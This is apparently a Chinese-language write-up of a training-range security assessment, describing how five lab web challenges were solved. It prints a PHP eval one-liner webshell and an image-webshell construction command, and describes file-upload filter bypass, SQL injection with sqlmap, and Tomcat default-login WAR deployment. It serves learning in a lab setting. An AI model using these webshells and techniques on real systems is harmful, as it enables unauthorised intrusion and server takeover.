前段時間參加了 360 眾測靶場的考核,感覺還挺有意思的,難度也適中,於是記錄一下解題過程。
題目一共分為兩個部分,第一部分是理論題,就是選擇加判斷,接觸過 web 安全的應該都能過,也可以直接百度,主要記錄第二部分的實操題。
第一關
開啟網頁如下圖所示,直接給出了提示,struts2-013,於是直接上 struts2 掃描器,一發入魂
於是成功拿到 key
第二關
第二關是個檔案上傳,網站是 php 的,經過測試發現一下規律:
- 正常上傳圖片,返回路徑
- 如果直接上傳 shell.php 會被攔截,提示檔案格式錯誤
- 改字尾 shell.jpg 也不可以,提示檔案格式錯誤
- 再改一下 content-type,直接沒有返回值了
猜測可能檢測位元組了,於是做了一個圖片馬,copy 1.jpb/b + 1.php/a 2.jpg
,上傳成功,於是開始爆破頁面看看有沒有檔案包含。
爆破半天也沒有成功,直接將上傳的圖片馬改成 php (如下圖),上傳成功
直接蟻劍連線,找到 key
第三關
先隨便點了點頁面,發現都是假功能,都沒回伺服器互動
爆破頁面,找到 admin 頁面
一個登入框,弱口令 admin/123456 直接進去
發現裡面是備份檔案的
抓包看一下,發現兩個重要引數 difle[],zipname
zipname 是打包後的 zip 名字,我們將字尾改成 php 則可以打包成 php 檔案,我們在網頁可以直接訪問。
如下圖,可以看到 index.php,這是我們要打包的檔案的名字
要打包的檔案的名字由 dfile[] 決定,於是我們將要打包的檔案的名字改成一句話木馬,即
<?php @eval($_POST['attack']);?>.php
菜刀直接連線即可
第四關
是一個登入頁面,剛開始以為是要嘗試弱口令,爆破了半天都沒用
然後看到下面紅框框出來的公告,點選去 url 是這樣的:/new_list.php?id=1](ip/new_list.php?id=1)
簡單加了個單引號頁面有變化,sql 注入,直接交給 sqlmap 了,這裡直接展示跑來的結果,一共兩個賬戶,第一個賬戶被禁用了,第二個賬戶的 hash 沒跑出來
cmd5 試一下,直接出來了
登入進去,key 值直接就給了
第五關
開啟頁面,是一個 tomcat 的預設頁面,直接 admin/123456 登入到後臺,然後參考文章:https://blog.csdn.net/weixin_41924764/article/details/108196725
部署 war 包直接 getshell
也是成功拿到 key
總結
在打靶場的過程中自己也能學到一些新的知識點 ,所以總體還是開心的,但是由於自己太菜有一些題完全沒有思路故沒有記錄,還有一點考核時 vpn 的連線時好時壞,這有點煩人。